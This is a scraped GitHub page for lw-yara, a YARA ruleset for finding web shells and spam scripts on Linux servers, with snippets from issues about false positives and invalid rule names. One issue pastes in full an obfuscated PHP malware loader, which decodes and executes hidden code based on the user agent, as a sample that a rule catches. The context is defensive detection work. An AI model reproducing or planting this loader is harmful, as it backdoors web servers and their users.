hestat / lw-yara Goto Github PK
View Code? Open in Web Editor NEWYara Ruleset for scanning Linux servers for shells, spamming, phishing and other webserver baddies
License: GNU General Public License v3.0
Yara Ruleset for scanning Linux servers for shells, spamming, phishing and other webserver baddies
License: GNU General Public License v3.0
/vendor/whmcs/whmcs-foundation/lib/Auth.php: YARA.eitest_injection_1.UNOFFICIAL FOUND
need to review and see if it can be tightened to prevent false hit
All with rule name that starts with digit (illegal):
tekel.yar
updater.yar
updw.yar
A plain Wordpress installation gets multiple hits on this rule
and eitest_injection_1
catches stuff eitest_injection_0
does not.
Example:
$dtcjqvv = 'bs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-rn chr(ord($n)-1);} @error_reporting(0); $cviphhs = implode(<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# xw2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-# 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 124 x54 120 x5ffunction uinpgbt($n){retu;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fm}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l]427]36]373P6]36]73]83]238M7]381]211M5]Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)feq% x5cSFWSFT`%}X;!sp!*#ophojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]R37,#/q%>U<#16,47R57,27R66,#/q%>w6< x7fw6*CW&)7gj6<*doj%7-C)f-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!* x22)!gj}1~!<2p% x7f!~!<##!>!2p%f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*qnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#p!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#Q;33bq}k;opjudovg}x;0]=]))#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283pdof./#@#/qp%>5h%!<*::::::-111112)eobfw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcY 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%wx24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! x74 141 x72 164") && (!isset($G#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)feosvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfs8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#wTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,670#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt27-K)ebfsX x27u%)7fmjix6<C x27&6<*#-# x24- x24-tusqpt)%z-#:#*pmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui x24- x24y7 x24- x24*<! x24- x24gps>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9*WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&LOBALS[" x61 156 x75 156 x61"])))) { $GLOBALS[" x61257]y86]267]y74]275]y7:]6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA s`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnarray_map("uinpgbt",str_split("%tjw!>!#]y84!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bu x5c1^W%c!>!%i x5c2^212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsepmqnjA x27&6<.fmjgA x27doj%6< x7fw6* x7r# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%)%j>1<%j=tj{fpg)% x24- x24*+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:OBSUOSVUFS,6<*msv%7-8y]#>q%<#762]67y]562]38y]572]48y]#>m%:|3]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275LB#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x2x27pd%6<pd%w6Z6<.2`hA x# x24#-!#]y38#-!%w:**<")));$uewhaoa = $eabmzjl("", $cviphy]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bub%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpzmqyf x27*&7-n%)utjm6< x7fw6*Cf5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFSid%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTf2!>!bssbz) x24]25 x24- x27e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7y%)utjm!|!*5! x27!hmg%)!gj!|!268]y7f#<!%tww!>! x2400~:<h%_t%:os%)uqpuft`msvd},;uqpuft`msvd}+;!>!E{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovgif((function_exists(" x6f 142 x5f 163W&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fep")) or (strstr($uas," x72 166 x3a 61 x31")) or (sjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id}!#*<%nfd>%fdy<Cb*[%h!>!pde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)h%)sutcvt-#w#)ldbqov>*ofm6 x75 156 x63 164 x69 157 x6e"; o#>>}R;msv}.;/#/#/},;#-#}+;bE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<of]275]y83]248]y83]256]y81]265]y722!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%wk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}67]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q!gjZ<#opo#>b%!**X)ufttj x22)gj#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw) x24- x24!>! x24/%tjw/ x24)% x24- ]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]27<!Ce*[!%cIjQeTQcOc/#00#3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]vufs:~:<*9-1-r%)s%>/h%:<**#5#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi/7^#iubq# x5cq% x27jsv%6<C>^#zsfvmy%,3,j%>j%!<**3-j%-bubE{W~!Ydrr)%rxB%epnbss!>!bssbz)%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h]254]y76#<!%w:!>!(%w:!>! x246767~6ufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7#44ec:649#-!#:618d5f9#-!#f6c68399#-!Kc]55Ld]55#*<%bG9}:}.}-b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%trstr($uas," x61 156 x64 162 x6f 151 %6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojR67]452]88]5]48]32M3]317]445]4-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}strstr($uas," x6d 163 x69 1452q%<#g6R85,67R37,18R#>q%V<*#fopoV;**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:x64"))) { $eabmzjl = " x63 162 x65 141 x74 145 x5f 14hs); $uewhaoa();}}!|!*nbsbq%)323ldfidk!~!<**q:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%ffuvso!%bss x5csboe))1/35.)1/14+9p%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsb%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]11*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSlsyphsgabbm'; $fiuyppwl=explode(chr((661-541)),substr($dtcjqvv,(27835-21909),(170-136))); $fwusrbkizu = $fiuyppwl[0]($fiuyppwl[(5-4)]); $ndznizsoe = $fiuyppwl[0]($fiuyppwl[(7-5)]); if (!function_exists('bxnaluyb')) { function bxnaluyb($ntgbnu, $nvbvwmv,$gylhceos) { $njfsbbl = NULL; for($cmgjxehye=0;$cmgjxehye<(sizeof($ntgbnu)/2);$cmgjxehye++) { $njfsbbl .= substr($nvbvwmv, $ntgbnu[($cmgjxehye*2)],$ntgbnu[($cmgjxehye*2)+(6-5)]); } return $gylhceos(chr((31-22)),chr((576-484)),$njfsbbl); }; } $ulcgoywn = explode(chr((298-254)),'3693,37,1314,32,2173,51,202,68,1133,50,5465,29,3819,49,5232,37,5571,53,4014,32,270,25,50,60,2340,43,4270,32,5061,34,4398,31,2248,32,3101,23,3768,51,3268,29,3730,38,1756,34,1564,68,5269,58,3499,49,1063,70,5095,35,4937,33,2546,56,2123,50,601,29,2506,40,762,56,3364,55,2904,20,5327,41,4429,68,295,35,3868,52,3611,33,3048,53,4302,43,2383,49,4073,55,4166,43,4209,61,4970,25,3989,25,3548,29,1961,60,3181,39,3644,49,730,32,422,57,1817,64,1346,53,1026,37,2280,60,0,50,2733,61,2794,42,3297,67,690,40,2081,42,4541,30,5642,27,5768,59,479,25,4046,27,2836,68,1399,58,818,68,3944,45,2629,70,2699,34,1632,56,569,32,5494,34,504,65,330,53,950,24,1688,68,4128,38,4345,53,2224,24,3577,34,4812,28,4497,44,5023,38,5827,65,2924,39,5669,67,3419,26,5396,69,1790,27,4627,34,1250,64,1881,35,2602,27,110,52,4880,57,2432,20,4731,23,4995,28,5130,36,4840,40,886,64,1497,67,2021,60,630,60,1457,40,3445,54,4661,70,2963,50,4754,58,5166,23,3920,24,3220,48,974,52,383,39,5368,28,2452,54,5736,32,5528,43,1916,45,5892,34,5189,43,1183,67,162,40,3013,35,4571,56,3124,57,5624,18'); $wwryofytu = $fwusrbkizu("",bxnaluyb($ulcgoywn,$dtcjqvv,$ndznizsoe)); $fwusrbkizu=$dtcjqvv; $wwryofytu(""); $wwryofytu=(578-457); $dtcjqvv=$wwryofytu-1; ?><?php
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.